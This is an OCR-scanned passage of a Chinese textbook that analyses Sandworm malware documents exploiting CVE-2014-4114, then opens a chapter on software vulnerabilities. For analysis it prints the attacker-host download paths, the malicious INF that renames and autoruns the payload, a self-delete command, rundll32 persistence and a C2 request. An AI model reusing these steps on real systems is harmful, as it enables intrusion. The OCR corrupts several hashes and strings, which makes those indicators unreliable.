下 面 结 合 各 种 恶意 代码 分 析 方 法 ,以 实际 的 恶意 代码 分 析 为 例 , 利 用 金刚 恶意 软件 智 
能 分 析 系 统 和 各 种 分 析 工 具 ,讲解 恶意 代码 分 析 的 核心 流程 , 简 述 用 到 的 分 析 方 法 和 分 析 
工具 。 金 刚 恶 意 软件 智能 分 析 系 统 是 中 国 科学 院 软 件 研 究 所 软件 智能 分 析 协 同 创新 团队 
基于 多 年 研究 成 果 研 发 的 一 套 面向 来 意 软 件 分 析 与 检测 的 动态 分 析 系 统 , 底 层 采用 基于 
硬件 模拟 技术 ,相关 技术 方法 已 在 RAZDD9 、ACSACO9 等 国际 会 议 上 发 表 。 

K 8-1 所 示 的 样本 是 沙 虫 CSandWorm) 攻 击 事件 中 发 现 的 一 个 恶意 文件 ,攻击 者 在 
Office PowerPoint 文档 中 嵌入 攻击 代码 ,通过 利用 微软 公司 Windows 系统 的 OLE 包 管理 器 
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中 存在 的 INF 任意 代码 执行 漏洞 (CVE-2014-4114) ,向 受害 者 的 机 器 中 植 人 远 控 木马 。 
表 8-1 恶意 文件 样本 














文件 名 spiski deputatov done. ppsx 
CRC32 d010cbb9 
MD5 330e8d23ab82e8a0ca6d166755408eb1 
SHA1 22fbbcfa5646497e57ee238al80d1b367789984a 





SHA256 4eda773e980f7ba52d7e31fd20e2551e2248f4800b8db750f3f46e35401a7b29 





43eb7d3dc79d0ddb24229dbaf40b0cfd05f3933d6bea30e939a81a04d6f6ecdb 


SERME 14a0cd6bc000d429d4b59364a8ae8ec7697bd7d4038334ac0599b8e7f390ebf0 





1536: ZpN92FIdQ0dwcuLoEDIDc-- Eupi-- VflagtYRmqLP0 十 SYqapUJhf8Zfdmk: 


d 
FRASER ZpH2KQ0dcEYWI--9i--mquPVLEbZ 





文件 大 小 106. 36 KB 





文件 类 型 Microsoft PowerPoint 2007/2008 Slideshow 








文件 属性 Zip archive data, at least v1. 0 to extract 


通过 在 VirusTotal 网 站 上 利用 样本 文件 的 MD5 进行 查询 可 知 , 该 样本 在 2014 年 8 
月 13 日 首次 被 上 传 到 该 网 站 ,最 近 一 次 上 传 时 间 是 2015 年 11 月 20 日 ,53 个 检测 引擎 
中 有 42 个 报告 该 样本 为 恶意 ,其 中 大 多 数 将 其 标记 为 利用 CVE-2014-4114 漏洞 的 恶意 
REO, 

利用 金刚 恶意 软件 智能 分 析 系统 对 样本 进行 快速 分 析 。 人 金刚 恶意 软件 智能 分 析 系 统 
提供 了 多 种 预 置 的 分 析 环 境 , 整 个 分 析 过 程 自 动 化 进行 ,并 且 可 以 将 样本 分 析 过 程 中 获得 
的 结果 数据 进行 筛选 .过 滤 ,提取 其 中 关键 信息 和 重要 内 容 , 生 成 全 面 翔实 的 分 析 结 果 报 
告 ,对 不 同类 型 的 检测 技术 和 分 析 功 能 获得 的 分 析 结 果 ,分门别类 进行 展示 ,并 以 具有 较 
好 可 读 性 的 方式 对 各 类 检测 结果 进行 说 明 解 释 ,帮助 用 户 更 好 地 理解 分 析 结 果 的 内 容 和 
各 个 检测 项 目的 含义 。 

选择 Windows 7 系统 和 Office 2007 应 用 软件 作为 分 析 环 境 , 将 该 恶意 文件 上 传 到 分 
析 平 台 进 行 分 析 。 分 析 报 告 记录 的 动态 行为 中 存在 从 远程 地 址 下 载 文 件 的 行为 :“ 复 制 
文件 \\94. 185. 85. 122\public\slidel. gif 到 C; \Users\win7user\ AppData\ Local\ Temp 
\slidel. gif", 

在 分 析 平 台 给 出 的 结果 报告 中 ,通过 动态 行为 逻辑 关系 图 可 以 清楚 地 看 到 恶意 文件 
运行 后 执行 了 两 次 文件 复制 操作 ,从 远程 地 址 94. 185. 85. 122 下 载 slidel. gif 和 slides 
.inf 两 个 文件 ,如 图 8-23 所 示 。 由 于 该 IP 地 址 已 经 被 阻 断 ,文件 没有 下 载 成 功 , 所 以 无 
法 检测 到 后 续 攻 击 行为 ,整个 分 析 过 程 只 监测 到 联网 下 载 攻击 代码 的 行为 。 

同时 ,从 分 析 过 程 中 提取 的 网 络 流量 上 也 可 以 看 出 ,恶意 文件 确实 尝试 连接 远程 主机 


(Q https://www. virustotal. com/en/file/70b8d220469c8071029795d32ea91829f683e3fbbaa8b978a31a0974daee- 
8aaf/analysis/. 





Ne/ 软件 安全 分 析 与 应 用 
— 制 文件 “| 文件 :Slide Lgif 
和 全 
(eg eem [PID 3484]POWERPNT.EXE 复制 文件 
poe el 


a 
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图 8-23 样本 动态 行为 逻辑 关系 图 

















文件 :slides.inf 








94. 185. 85. 122, 但 没有 成 功 ,如 表 8-2 所 示 。 
表 8-2 恶意 文件 主要 的 网 络 访问 行为 


协议 源 地 址 目标 地 址 长 度 网 络 数据 


wfremotertm > microsoft-ds [SYN] Seq 0 Win = 
65535 Len=0 MSS—1460 SACK PERM—1 


wíremotertm > microsoft-ds [ACK] Seq=1 Ack— 1 
Win—65535 Len—0 


neodl > netbios-ssn [SYN] Seq=0 Win= 65535 Len 
—0 MSS=1460 SACK PERM-1 





TCP 10.0.2.15 | 94.185.85.122 | 62 





TCP 10.0.2.15 | 94.185.85.122 | 60 





TCP 10.0.2.15 | 94.185. 85.122 | 62 





SMB 10.0.2.15 | 94. 185. 85. 122 | 191 | Negotiate Protocol Request 


Session request, to * SMBSERV-— 002—007 —002 
NBSS | 10.0.2.15 | 94.185. 85.122 | 126 | «002 — 002 «002» — 002» —00- from XPGOOD- 
EDA4F623A 007 








[TCP Retransmission ] Session request, to * 
NBSS | 10.0.2.15 | 94. 185. 85. 122 | 126 | SMBSERV 002 —00- «002» «002 — 007» «002 
«002—002 from XPGOOD-ED4F623A <00> 





SMB  |10.0.2.15 | 94.185. 85. 122 | 191 | [TCP Retransmission] Negotiate Protocol Request 





[TCP Retransmission ] Session request, to * 
NBSS | 10.0.2.15 | 94. 185. 85. 122 | 126 | SMBSERV 00 «002 «002 —002 «002 «007 
«002—002 from XPGOOD-ED4F623A-—00- 





SMB 10.0.2.15 | 94.185. 85. 122 | 191 | [ TCP Retransmission] Negotiate Protocol Request 

















由 于 . PPSX 文件 实际 上 是 一 个 ZIP 压缩 包 , 因 此 ,将 该 文件 解压 ,可 以 看 到 其 中 包含 
大 量 文件 , 大 部 分 文件 都 是 文本 和 图 片 ,只 有 在 spiski_ deputatov_done. ppsx \ ppt \ 
embeddings\ 下 存在 两 个 二 进 制 文件 : oleObjectl. bin 和 oleObject2. bin, 利 用 TrID 识别 
这 两 个 文件 的 类 型 为 

100.0% €. ) Generic OLE2 / Multistream Compound File (8000/1) 

根据 文档 结构 和 类 型 识别 结果 可 知 , 上 述 两 个 文件 是 嵌入 PowerPoint 中 的 OLE 对 
象 .因此 需要 重点 分 析 。 通 过 strings 提取 字符 串 , 可 以 看 到 oleObjectl. bin "Pf fe "NN 
94. 185. 85. 122\public\ slidel. gif”, oleObject2. bin 中 存在 “\\94. 185. 85. 122\public\ 
slides. inf” 字 符 串 ,这 与 动态 行为 分 析 观 察 到 的 文件 远程 下 载 地 址 一 致 。 用 二 进 制 编辑 
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器 打开 oleObjectl. bin 文件 ,可 以 很 容易 找到 该 字符 串 , 如 图 8-24 所 示 。 





0800h: 33 00 00 OO 45 6D 62 65 64 64 65 64 53 74 67 31 | 3...EmbeddedStgi 
0810h: 2E 74 78 74 00 SC 5C 39 34 2E 31 38 35 2E 38 35 | .txt.1194.185.85 
0820h: 2E 31 32 32 5C 70 75 62 6C 69 63 SC 73 6C 69 64 .122Ypublicislid 
0830h:| 65 31 2E 67 69 66 O0 00 OO 00 00 00 00 00 00 O0 | ei.gif.........-. 


图 8-24 oleObjectl. bin 文件 中 的 可 疑 字符 串 











为 此 ,手动 修改 oleObjectl. bin 和 oleObject2. bin 文件 中 的 远程 文件 下 载 地 址 ,将 远 
程 主机 的 TP 地 址 改 为 本 地 地 址 192. 168. 4. 252 ,如 图 8-25 所 示 ,然后 将 通过 VPN 连接 下 
载 的 slidel. gif 和 slides. inf 文件 放 入 本 地 主机 的 public 共享 目录 下 ,构造 一 个 满足 恶意 
文件 成 功 攻击 所 需 的 分 析 环 境 , 然 后 再 次 进行 动态 行为 分 析 。 





0800h: 33 00 00 OO 45 6D 62 65 64 64 65 64 53 74 67 31 | 3...EmbeddedStgi 
0810h: 2E 74 78 74 O0 5C 5C 31 39 32 2E 31 36 38 2E 34 | .txt.11192.168.4 
0820h: 2E 32 35 32 5C 70 75 62 6C 69 63 SC 73 6C 69 64 -252Ypublicislid 
0830h: 65 31 2E 67 69 66 00 OO OO 00 OO 00 00 00 OO OO | ei.gif.......... 





图 8-25 修改 后 的 oleObjectl. bin 文件 中 的 可 疑 字符 串 


如 预期 的 那样 ,修改 后 的 恶意 文件 成 功 触 发 了 攻击 ,下 载 了 攻击 代码 ,执行 了 一 系列 
操作 ,并 且 释 放 了 其 中 的 木马 程序 ,充分 展现 了 有 具体 的 攻击 行为 。 整 个 攻击 过 程 的 行为 好 
辑 关系 如 图 8-26 所 示 。 从 图 中 可 以 看 到 整个 攻击 过 程 包含 了 多 个 步骤 ,涉及 多 个 进程 ; 

。 POWERPNT. EXE 进程 启动 后 ,slidel. gif 文件 被 下 载 到 本 地 ,并 且 POWERPNT 

.EXE 进程 创建 了 InfDefaultInstall. exe 进程 。 

* InfDefaultInstall. exe 进程 又 进一步 创建 了 runonce. exe 进程 ,并 且 将 文件 slidel 
. gif 重 命 名 为 slidel. gif. exe。 
runonce. exe 进程 启动 了 slidel. gif. exe 进程 和 grpconv. exe 进程 。 

e slidel. gif. exe 进程 释放 了 一 个 可 执行 程序 FONTCACHE. DAT, 创 建 了 一 个 快 

捷 方式 (20B6FADD-FADD-BEB7-DDFA-B620DDFAB620}. Ink, JA Z} T cmd. exe 
和 rundll32. exe 进程 。 

* cmd. exe 进程 进一步 启动 了 PING. EXE 进程 ,并且 删除 了 文件 slidel. gif. exe; 

进一步 分 析 文 件 释放 和 进程 创建 相关 行为 ,从 平台 记录 的 原始 行为 和 参数 可 以 看 到 ， 
slidel. gif. exe 通过 调用 CreateFile 创建 了 快捷 方式 C: \ Documents and Settings V 
Administrator\" 开 始 , 菜 单 \ 程 序 \ 启 动 \{24D5AC7B-AC7B-6B1E-7BAC-D5247BACD524} 
. lnk, 该 快捷 方式 内 容 为 %windir%\System32\rundll32. exe "C: \Documents and Settings\ 
Administrator\ Local Settings\ Application Data\FONTCACHE. DAT " ,MakeCache, 从 而 利用 
自 启动 快捷 方式 运行 rundll32. exe 启动 恶意 程序 FONTCACHE. DAT ,如 图 8-27 所 示 。 

此 外 ,slidel. gif. exe 创建 cmd. exe 进程 时 使 用 了 如 下 的 调用 参数 : 


C:\WINDOWS\system32\cmd.exe /s/c "for/L $i in (1,1,100) do (del /F "c:\work\SLIDEl~1. 
EXE" & ping localhost -n 2 & if not exist "c: NWworkMSLIDEl- 1.EXE" Exit 1)" 
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B rundl132. exe:2028 Properties 








Image [Performance || Disk and Network | Performance Graph | Threads | TCP/IP | Security | Environment || Strings | 








Image Fie 


d Run a DLL as an App 
(Not verified) Microsoft Corporation 
Version: 5.1,2600.2180 
Time: 2004-8-17 22:00 
Path: 
[CAWINDOWSIsystem32lrundi32.exe 
Command ine: 
l'C:WINDOWSIsystem32|rundl2 exe" "C] Documents and SettingslAdmiistratorlLocal SettingslApplication DatalFONTCACHE.DAT" MakeCache. 
Current drectory: 
[C:AWINDOWSIsystema?l 





























图 8-27 通过 rundll32. exe 运行 恶意 程序 


slidel. gif. exe 通过 启动 cmd. exe 采用 命令 行 方式 删除 自身 ,并 且 为 了 避免 因为 
slidel. gif. exe 进程 没有 退出 而 删除 失败 ,攻击 者 利用 了 批 处 理 脚 本 循环 多 次 执行 删除 操 
作 , 还 在 循环 过 程 中 加 上 了 ping 做 延 时 等 待 。 

通过 查看 slides. inf 文件 的 内 容 , 可 以 看 到 其 中 存在 如 下 内 容 , 这 与 动态 行为 观察 到 
的 InfDefaultInstall. exe 将 slidel. gif 重 命 名 为 slidel. gif. exe, 并 且 通 过 runonce. exe 进 
程 启动 了 slidel. gif. exe 是 一 致 的 。 


[DefaultInstall] 

RenFiles=RxRename 

AddReg-RxStart 

[RxRename] 

slidel.gif.exe, slidel.gif 

[RxStart] 

HKLM, SoftwareMMicrosoftWindowsNCurrentVersionNRunOnce, Install, ,$ 1$ Vslidel .gif.exe 


通过 对 slidel. gif 进行 静态 分 析 , 可 以 发 现 该 恶意 代码 将 自身 伪装 成 一 个 CHM 文件 
查看 器 CHMView. exe, 如 表 8-3 所 示 。 通 过 查找 VirusTotal 分 析 结 果 可 知 了 ,该 恶意 代 
码 与 BlackEnergy 这 一 臭名 昭著 的 攻击 组 织 密切 相关 ,该 恶意 代码 已 经 在 该 组 织 发 动 的 
其 他 网 络 攻 击 中 被 发 现 过 。 
表 8-3 对 slide 进行 静态 分 析 的 结果 














文 件 名 slidel. gif 
CRC32 6b10a909 
MD5 8a7c30a7al05bd62ee71214d268865e3 
SHA1 8a7c30a7a105bd62ee71214d268865e3 








(D https://www. virustotal. com/en/file/0fda6c118fb7dc946440cb9225e32ab1825d87d4f088bb75a6eab7cef354- 
33bc/analysis/. 
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续 表 
x 件 名 slidel. gif 
SHA256 Ofda6c118fb7dc946440cb9225e32ab1825d87d4f088bb75a6eab7cef35433bc 
SHAPIS 1lfbc7c0a0ace86dd368e387c84bí7cedíc2eada817837fd947dca9224ae2b311d2d20b3cled 


be0a21cf631cdd894cf5a9b41b4632dce372b06819e0442394718 





ssdeep 3072; iZaJoYqOcMejjcRpyNrKjan4L2IUhv7tF9; 2NMkJNeKFN 





Import Hash Í6ebfíc6647b4021d76f6f7ebbede48ad 











文件 大 小 106KB 
文件 类 型 EXE / DLL File 
文件 属性 MS-DOS executable 





Verified: Unsigned 
File date: 9: 49 2014-10-15 
Publisher: Yo-Dizign 


Sysint IsSuit: 
YS nena SOUe | Description: Utility for viewing CHM files 


igcheck 
MEREN Product: Utility for viewing CHM files without IExplorer 


Version; 0. 2 
File version; 0. 2 





此 外 ,由 slidel. gif. exe 释放 的 可 执行 程序 FONTCACHE. DAT 也 是 一 个 
BlackEnergy 相关 的 恶意 代码 ?了 ,由 于 在 自动 化 的 动态 分 析 过 程 中 没有 捕获 到 该 恶意 代码 
相关 的 动态 行为 ,通过 人 工分 析 可 以 发 现 该 文件 采用 了 代码 加 密 , 是 具有 联网 并 接收 远程 
控制 指令 功能 的 木马 。 实 际 上 ,该 恶意 文档 及 其 释放 的 恶意 程序 只 是 该 攻击 事件 中 相关 
样本 的 一 部 分 ,有 关 该 攻击 事件 中 其 他 恶意 代码 的 详细 分 析 , 读 者 可 以 参阅 国内 外 安全 公 
司 发 布 的 分 析 报告 ne 。 

一 个 有 意思 的 现象 是 ,Microsoft Security Essentials 安全 软件 会 对 我 们 的 分 析 系 统 
产生 的 行为 关系 图 svg 文件 产生 误 报 @ ,将 文件 标记 为 Exploit: Win32/CVE-2014-4114， 
修改 “\\94. 185. 85. 122\public\slides. inf” 和 “\\94. 185. 85. 122\public\slidel, gif” 这 两 
个 关键 的 字符 串 中 的 TP 地 址 或 文件 名 之 后 可 以 消除 误 报 。 由 于 该 svg 文件 是 个 结构 简 
单 的 纯 文本 ,因此 可 以 推断 Microsoft Security Essentials 将 这 两 个 字符 串 作 为 了 该 漏洞 
攻击 的 检测 特征 。 

由 于 CVE-2014-4114 漏洞 非常 容易 利用 ,该 漏洞 公开 不 久 即 出 现 了 多 个 变种 ,其 中 包括 
不 需要 从 远程 主机 下 载 攻 击 文件 ,直接 将 恶意 代码 内 嵌 于 恶意 文档 中 的 变种 。 表 8-4 就 是 
其 中 的 一 个 变种 。 

表 8-4 漏洞 攻击 代码 的 变种 之 一 


@ https://www. virustotal. com/en/file/3c568ecf5d91867a5ea69c8ba8a226536bfb7c4cd2072bd3688b9aedb6177- 
ae4/analysis/. 

Q https://www. virustotal. com/en/file/7c3251248d64083fa37c8799070813ce363c5f3953680408í6ad2069c223- 
508/analysis/1456970488/. 
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x f 名 健康 的 重要 . ppsx 
CRC32 654b8e78 
MD5 7556e1bb34f338bb616aa2cff86a3803 
SHAI1 34424abeb35a02197139324801308061201426b 





SHA256 65a8bf996bíc23405be764266d7409a65fa936d19cee52b61ef83e29dcdd6230 





6ee25dadf08694ecc8ad18ff6fa94f4abd4904ac10205e1d2057fíd4d670193d4510c72de39469 


SHA512 
c3e888719cc64aebf6c99ed4d0516a1d86629106í2ad0e8e039 





ssdeep 24576: jvo7/PZI TxJ5Ws4QtCE4 wE7]Scae3s YnkUd7hL : uDXsskE4wEI1h66 





文件 大 小 | 1.39MB 





文件 类 型 | Microsoft PowerPoint 2010/2011 Slideshow 








文件 属性 | Zip archive data, at least v1. 0 to extract 


通过 在 VirusTotal 网 站 上 查询 可 知 ,该 恶意 文档 在 2014 年 10 月 21 日 首次 被 上 传 
到 该 网 站 ,最 近 一 次 上 传 时 间 是 2015 年 5 月 11 日 ,55 个 检测 引擎 中 有 37 个 报告 该 样本 
为 恶意 ,其 中 大 多 数 检测 引擎 将 其 标记 为 利用 CVE-2014-4114 漏洞 的 恶意 代码 ?。 

仔细 分 析 这 个 变种 样本 ,可 以 看 到 其 中 其 中 仍然 嵌入 了 两 个 OLE 对 象 oleObjectl 
. bin 和 oleObject2. bin, 只 不 过 与 最 初版 本 相 比 ,变种 中 oleObjectl. bin 不 再 包含 攻击 文 
件 的 远程 下 载 地 址 ,而 是 直接 包含 了 slides. inf 的 内 容 , 如 图 8-28 所 示 。 类 似 地 ， 
oleObject2. bin 则 直接 内 能 了 slidel. gif ,如 图 8-29 所 示 o 

此 外 ,oleObjectl. bin 和 oleObject2. bin 中 还 存在 *C: \Users\xy\slidel. gif”“C: \ 
Users\ibm\AppData\Local\Temp\slidel. gif” 等 字符 串 , 疑 似 该 变种 制作 者 的 相关 操作 
系统 路 径 信息 。 

同样 利用 金刚 恶意 软件 智能 分 析 系 统 对 该 变种 样本 进行 分 析 , 同 样 选择 Windows 7 
搭配 Office 2007 的 分 析 环 境 。 平 台 给 出 的 该 样本 分 析 报 告 显示 ,变种 样本 与 原始 样本 的 
攻击 流程 基本 一 致 。 根 据 如 图 8-30 所 示 的 动态 行为 关系 图 ,整个 攻击 过 程 如 下 : 

(D POWERPNT. EXE 进程 启动 后 ,在 当前 用 户 的 Temp 目录 下 创建 slides. inf 和 
slidel. gif 文件 ,并 日 POWERPNT. EXE 进程 创建 了 InfDefaultInstall. exe 进程 。 

(2) InfDefaultInstall. exe 进程 将 文件 slidel. gif 重 命 名 为 slidel. gif. exe, 创建 了 
OLDE752. tmp 可 执行 程序 ,之 后 又 删除 了 该 可 执行 程序 ,并 且 InfDefaultInstall. exe 进 
程 进一步 创建 了 runonce. exe 进程 。 

(3) runonce. exe 进程 启动 了 slidel. gif. exe 进程 和 grpconv. exe 进程 。 

(4) slidel. gif. exe 进程 又 启动 了 svchost. exe 进程 。 

(5) svchost. exe 进程 作为 恶意 代码 的 宿主 ,执行 了 联网 操作 。 


加 ”https://www. virustotal. com/en/file/65a8bf996bfc23405be764266d7409a65fa936d19cee52b6lef83e29dcdd- 
6230/analysis/. 





图 8-28 
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样本 变种 的 oleObjectl. bin Pj Æ 
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8-29 ”样本 变种 的 oleObject2. bin 内 容 


61883.INF..; Co 
pyright blabla.. 
.. [Version] ..Sig 
nature = "$CHICA 
GO$"..Class-6188 
3..ClassGuid-( 7E 
BEFBCO-3200-11d2 
-B4c2-00A0C9697D 
17)..Provide-*5Ms 
ft*..DriverVer-0ü 
6/21/2006,6.1.76 
00.16385....[Des 
tinationDirs]..D 
efaultDestDir = 
1....[DefaultIns 
tall]..RenFiles 
= RxRename..AddR 
eg = RxStart.... 
[RxRename]..slid 
el.gif.exe, slid 
ei.gif..[RxStart 
J] . . HKLM, Software 
\Microsoft\Windo 
ws\CurrentVersio 
n\ RunOnce, Instal 
l,,%1$\slide1l.gi 
f.exe*...C.:.\.U 
.S.8.r.s.V.i.b.m 
Ap.p.D.ac.a 








$.....slidel.gif 
.C:\Users\xy\sli 
dei.gif.....*... 
C:YVUsersiibmàpp 
DataiLocalTemp 
slidel.gif. san 
Z. 








el 和 
3 program cannot 
be run in DOS m 
ode....$ 





有 cx=DSisBiicsDSis 
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从 金刚 恶意 软件 智能 分 析 系 统 给 出 的 分 析 报告 中 ,可 以 看 到 恶意 文件 在 执行 过 程 中 
产生 的 网 络 流量 ,其 中 主要 的 网 络 访问 行为 如 表 8-5 所 示 , 可 以 看 到 恶意 代码 试图 连接 
115. 119. 67. 83 的 443 端口 ,在 尝试 连接 多 次 不 成 功 之 后 ,又 试图 通过 域名 
thesecondperson. linkin. tw 寻找 命令 控制 服务 器 。 


表 8-5 恶意 文件 主要 的 网 络 访问 行为 


协 议 源 地 址 目标 地 址 长 度 网 络 数据 


491817 https [SYN] Seq=0 Win= 8192 Len—0 
MSS=1460 WS—4 SACK PERM-1 

491817 https LACK] Seq — 1 Ack — 1 Win— 
256960 Len—0 








TCP 10.0.2.15 | 115. 119. 67. 83. | 66 





TCP 10.0.2.15 | 115. 119. 67. 83. | 60 





SSL 10.0.2.15 | 115. 119. 67. 83. | 246 | Continuation Data 





SSL 10.0.2.15 | 115.119.67.83 | 246 | [TCP Retransmission] Continuation Data 





SSL 10.0.2.15 | 115.119.67.83 | 246 | [TCP Retransmission] Continuation Data 
491817 https [RST, ACK] Seq— 193 Ack— 1 





TCP 10.0.2.15 | 115.119. 67. 83. | 60 








Win=0 Len=0 
DNS 10.0.2.15 | 10.0.2.3 85 Standard query A thesecondperson. linkin. tw 
DNS 10.0.2.3 10. 0. 2. 15 144 | Standard query response，No such name 














为 了 进一步 分 析 恶 意 代码 发 送 的 网 络 数 据 内 容 , 从 金刚 恶意 软件 智能 分 析 系 统 下 载 
了 记录 分 析 过 程 中 产生 的 所 有 网 络 流 量 的 pcap 包 , 通 过 Wireshark 工具 ,可 以 看 到 恶意 
代码 发 往 命令 控制 服务 器 的 数据 为 

GET /nnafy.php? id- 020272636511234567 HTTP/1.1 

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) 

Host: 115.119.67.83:443 

Connection: Keep- Alive 


Cache- Control: no- cache 


从 参数 名 字 推 断 , 该 内 容 为 恶意 代码 产生 的 受害 者 标识 ID。 由 于 命令 控制 服务 器 已 
经 下 线 ,因此 动态 分 析 无 法 给 出 进一步 的 分 析 结 果 。 


8.5 小 结 


恶意 代码 分 析 是 一 项 艰巨 的 工作 ,由 于 攻击 者 可 以 采用 各 种 各 样 的 技术 ,因此 分 析 人 
员 需 要 掌握 从 汇编 语言 到 脚本 语言 ,从 操作 系统 到 加 密 算法 等 各 种 知识 ,并 且 需 要 熟悉 各 
种 静态 \ 动 态 分 析 技 术 ,熟练 使 用 不 同 分 析 工具 ,很 多 时 候 还 需要 大 量 的 时 间 和 极 大 的 耐 
心 。 本 章 介绍 了 恶意 代码 分 析 的 总 体 流程 ,典型 的 静态 分 析 方 法 和 工具 ,主要 的 动态 分 析 
方式 及 其 挑战 ,并 结合 恶意 程序 和 恶意 文档 两 种 类 型 的 实际 样本 ,利用 上 述 分 析 方 法 和 工 
具 进 行 了 实际 案例 分 析 。 由 于 恶意 代码 检测 与 分 析 领 域 是 一 个 攻防 技术 不 断 发 展 . 对 抗 
不 断 升 级 的 热点 领域 ,关于 这 方面 的 学 术 研究 和 工程 实践 都 有 大 量 成 果 ,本章 介绍 的 方法 
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和 工具 只 是 其 中 一 小 部 分 ,读者 可 以 根据 实际 分 析 中 遇 到 的 样本 具体 情况 ,选择 合适 的 方 
法 和 工具 开展 分 析 工作 。 
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Pad 9 音 


软件 漏洞 挖掘 与 分 析 


软件 漏洞 通常 指 能 够 引起 严重 后 果 的 计算 机 安全 缺陷 ,该 缺陷 使 得 系统 或 其 应 用 数 
据 的 保密 性 、 完 整 性 、 可 用 性 、 访 问 控制 监测 机 制 等 面临 威胁 。 软 件 漏洞 具有 机 理 复杂 、 
产生 原因 多 样 、 攻 击 结果 各 异 的 特点 。 当 前 ,对 软件 漏洞 的 机 理 分 析 、 利 用 生成 是 软件 漏 
洞 研究 的 主要 热点 。 

在 本 章 中 ,重点 针对 当前 危害 最 大 的 控制 流动 持 类 漏洞 展开 讨论 ,论述 当前 最 新 的 漏 
洞 机 理 分 析 方 法 和 漏洞 利用 生成 方法 。 本 章 首先 介绍 漏洞 基础 知识 ,然后 讨论 漏洞 分 析 
方法 和 漏洞 利用 方法 ,最 后 展望 漏洞 分 析 和 利用 的 下 一 步 研究 内 容 。 


9.1 软件 漏洞 基础 知识 


911 概述 


漏洞 是 在 硬件 软件、 协议 的 具体 实现 或 系统 安全 策略 上 存在 的 缺陷 ,导致 可 被 攻击 
者 利用 ,造成 软件 研发 人 员 预 期 之 外 的 安全 危害 ,如 敏感 信息 泄露 或 被 恶意 修改 ,系统 崩 
省 或 损坏 ,甚至 计算 机 系统 和 程序 被 攻击 者 控制 等 。 通 常情 况 下 ,该 缺陷 由 程序 中 存在 的 
错误 引起 ,错误 可 能 在 软件 设计 阶段 .实现 阶段 或 者 部 署 应 用 等 阶段 被 引入 。 错 误 发 生 的 
原因 包括 : 软件 设计 和 研发 人 员 受 限于 安全 防护 意识 和 知识 ,研发 过 程 或 设计 方案 违反 
安全 设计 原则 ;软件 研发 人 员 因 朴 忽 在 实现 代码 中 引入 编码 错误 ;软件 运 维 人 员 部 署 和 维 
护 软 件 过 程 中 违反 软件 安全 运行 规范 ;恶意 攻击 者 在 软件 设计 研发 或 编译 阶段 故意 引入 
错误 等 。 软 件 漏洞 本 质 上 属于 缺陷 ,而 由 于 软件 本 身 的 复杂 性 ,缺陷 的 发 现 往往 比较 困 
难 ,目前 还 没有 方法 能 够 确保 在 有 限 的 时 间 内 发 现 所 有 缺陷 或 者 大 部 分 缺陷 。 软 件 厂 商 
受 限 于 各 种 条 件 ,其 相关 产品 漏洞 的 发 现 仍 然 依赖 少量 有 经 验 的 技术 专家 ,漏洞 发 现 效率 
很 低 ,至 今 仍 不 时 发 现 潜藏 数 年 的 软件 漏洞 。 而 恶意 攻击 者 出 于 利益 能 投入 更 多 的 资源 
和 人 力 ,发 现 大 量 未 知 零 日 (0day) 漏 洞 , 并 实施 漏洞 攻击 。 总 体 而 言 ,漏洞 的 发 现 、 分 析 和 
修补 往往 滞后 于 漏洞 攻击 ,使 得 针对 漏洞 的 攻击 总 能 够 产生 十 分 严重 的 后 果 。 

研究 人 员 通 常 关注 漏洞 从 发 现 到 修补 的 整个 生命 周期 ,但 其 中 的 关键 和 难点 在 于 漏 
洞 的 发 现 、 机 理 分 析 和 危害 评估 。 漏 洞 发 现在 第 6 章 已 有 详细 的 介绍 ,本 章 不 再 袭 述 , 重 
点 论述 软件 漏洞 机 理 分 析 方 法 和 基于 利用 生成 的 漏洞 危害 评估 方法 ,涉及 的 漏洞 类 型 为 
控制 流动 持 类 漏洞 。 

由 于 漏洞 机 理 复杂 ,为 了 准确 记录 漏洞 的 各 种 关键 属性 信息 ,管理 已 经 发 现 的 漏洞 ， 
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指导 漏洞 的 修补 工作 ,学 术 界 和 工业 界 尝试 综合 漏洞 类 型 .产生 原因 漏洞 后 果 等 要 素 , 提 
出 统一 的 标准 对 漏洞 进行 分 类 ,进而 准确 ,简洁 地 描述 漏洞 ,为 信息 安全 测评 和 风险 评估 
提供 依据 。 美 国 在 漏洞 标准 方面 走 在 世界 的 前 列 , 开 展 了 长 期 的 漏洞 分 类 标准 研究 ,形成 
了 大 量 成 果 , 先 后 提出 了 CVE,CVSS,CWE 等 具有 较 大 国际 影响 力 的 漏洞 标准 ,当前 被 
安全 厂商 和 各 种 研究 组 织 广泛 采用 的 漏洞 标准 主要 以 国际 电信 联盟 (ITU) 的 电信 标准 化 
部 门 的 6 个 标准 为 主 , 除 此 之 外 ,美国 国家 标准 与 技术 研究 院 C(NIST) 发布 了 安全 内 容 自 
动 化 协议 ,国际 标准 化 组 织 (ISO) 发布 了 ISO/IEC 29147 和 ISO/IEC 30111 两 个 标准 。 
我 国 发 布 了 GB/T 28458—2012, GB/T 30279 一 2013,《 信 息 安全 技术 安全 漏洞 分 类 规 
范 》 正 在 制订 中 。 
表 9-1 当前 被 广泛 使 用 的 ITU 漏洞 标准 


























序号 | 缩写 英文 全 称 名 R A 号 
1 | CVE |Common Vulnerability and Exposure 通用 脆弱 性 与 风险 标准 | ITU-T X. 1520 
2 | CVSS |Common Vulnerability Scoring System 通用 脆弱 性 评分 系统 ITU-T X. 1521 
3 | CWE |Common Weakness Enumeration 通用 缺陷 枚 举 标准 ITU-T X. 1524 
4 | CWSS |Common Weakness Scoring System 通用 缺陷 评分 系统 ITU-T X. 1525 
5 | OVAL |Open Vulnerability and Assessment Language | 开放 漏洞 评估 语言 ITU-T X. 1526 
6 | CPE Common Platform Enumeration 通用 平台 枚 举 标准 ITU-T X. 1528 








尽管 已 经 存在 大 量 的 漏洞 标准 ,然而 由 于 软件 漏洞 具有 多 方面 的 属性 和 复杂 的 内 部 
机 理 , 因 而 往往 会 出 现 同一 个 漏洞 覆盖 多 种 漏洞 类 型 的 情况 。 例 如 , 某 些 漏洞 产生 的 原因 
是 由 于 整数 溢出 导致 写 人 内 容 超 长 ,进而 覆盖 了 后 续 的 堆 内 容 , 此 类 漏洞 同时 具有 整数 溢 
出 和 堆 溢 出 的 属性 。 因 此 , 某 些 情况 下 即使 漏洞 分 类 标准 明确 ,通过 单一 的 特征 也 很 难 对 
软件 漏洞 进行 准确 的 区 分 。 

由 于 本 节 重 点 在 于 介绍 控制 流 劫持 类 漏洞 的 分 析 方法 和 利用 生成 方法 ,在 此 简单 介 
